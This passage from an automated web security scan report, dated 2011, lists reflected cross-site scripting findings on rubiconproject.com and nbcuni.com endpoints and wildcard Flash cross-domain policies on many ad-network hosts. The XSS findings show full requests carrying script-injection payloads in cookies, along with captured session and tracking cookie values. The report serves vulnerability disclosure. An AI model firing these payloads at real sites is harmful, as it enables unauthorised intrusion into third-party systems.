P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1300433.js^18^1315321062^1315321066&1295118.js^3^1315321062^1315321062&2553662.js^5^1315321061^1315321061&1295153.js^3^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^-1612640932; expires=Tue, 13-Sep-2011 14:57:46 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300433"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1dcb9"-alert(1)-"3db46c88d9f\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a75"><script>alert(1)</script>5b71f4343a7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=67a75"><script>alert(1)</script>5b71f4343a7; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^744f40729e51a8caac2210640; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1785

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67a75"><script>alert(1)</script>5b71f4343a7" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e19"-alert(1)-"aad8da393bf was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=f1e19"-alert(1)-"aad8da393bf; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:16:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^1044f407298942487860d6b793; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60237; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1716

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f1e19"-alert(1)-"aad8da393bf\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 5b8f5<script>alert(1)</script>aa3aff42c32 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:28 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_nr cookie is copied into the HTML document as plain text between tags. The payload 60d58<script>alert(1)</script>39205ed221 was submitted in the s_nr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=131344646830060d58<script>alert(1)</script>39205ed221; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:00 GMT
Content-Length: 207
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"131344646830060d58<script>alert(1)</script>39205ed221","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload 1a3d0<script>alert(1)</script>a48e60d2b0a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:03 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a"}});

4. Flash cross-domain policy
There are 135 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://a1.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Xonnection: Xeep-alive
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://action.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Tue, 06 Sep 2011 16:45:41 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.4. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15f2"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.7. http://ads.rnmd.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.rnmd.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
Last-Modified: Fri, 26 Aug 2011 16:48:34 GMT
ETag: "150291-80-4ab6b50e6dc80"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.8. http://afe.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.9. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 23:17:09 GMT
Date: Mon, 05 Sep 2011 23:17:09 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 58526

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.10. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 15:37:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.11. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains. Note that the second directive, domain="all", is not a recognised wildcard in the policy syntax: Flash Player treats it as the literal host name "all", so it adds nothing beyond the domain="*" entry already present.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Tue, 06 Sep 2011 21:37:51 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.12. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.13. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.14. http://c.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.15. http://cache.specificmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n18 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 01:38:58 GMT
Age: 393610
Content-Length: 194
Content-Type: text/xml
